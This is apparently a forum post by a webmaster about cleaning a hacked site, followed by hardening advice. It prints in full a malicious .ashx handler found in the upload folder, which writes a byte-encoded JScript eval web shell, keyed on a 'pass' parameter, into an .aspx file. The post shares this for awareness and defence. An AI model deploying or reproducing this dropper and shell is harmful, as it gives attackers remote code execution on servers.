cnylj - 2018/12/3 18:38:12
今天又帮朋友清理被黑站!发现他的upload目录中有.ashx文件,打开可以看到如下代码!!!!
<%@ WebHandler Language="C#" Class="Handler" %>
using System;
using System.Web;
using System.IO;
public class Handler : IHttpHandler
{
public bool IsReusable
{
get
{
return false;
}
}
public void ProcessRequest(HttpContext context)
{
byte[] b={0x3C, 0x25, 0x40, 0x20, 0x50, 0x61, 0x67, 0x65, 0x20, 0x4C, 0x61, 0x6E, 0x67, 0x75, 0x61, 0x67, 0x65, 0x3D, 0x22, 0x4A, 0x73, 0x63, 0x72, 0x69, 0x70, 0x74, 0x22, 0x25, 0x3E, 0x3C, 0x25, 0x65, 0x76, 0x61, 0x6C, 0x28, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x2E, 0x49, 0x74, 0x65, 0x6D, 0x5B, 0x22, 0x70, 0x61, 0x73, 0x73, 0x22, 0x5D, 0x2C, 0x22, 0x75, 0x6E, 0x73, 0x61, 0x66, 0x65, 0x22, 0x29, 0x3B, 0x25, 0x3E};
try
{
File.WriteAllBytes(context.Server.MapPath("/e/upload/s1/article/file/")+"/file.aspx",b);
context.Response.Write("oooooooookkkkkkkkk");
}
catch(Exception ex)
{
context.Response.Write(ex.Message);
}
context.Response.End();
}
}
cnylj - 2018/12/3 18:41:54
其实还有几个黑客文件,这里就不公开了,大家做好目录安全防范, 官方说的删除incs下面的那个上传目录,大家一定记得清理, 还有官方提醒的删除文件也要删除干净再说!
另外被黑的网站最好重新从官方下载程序,把你的模板和数据逐步导入官方程序,然后按照官方说法删除一些不必要文件和目录,在升级,改数据库名,改超管名字,这样基本上没问题了!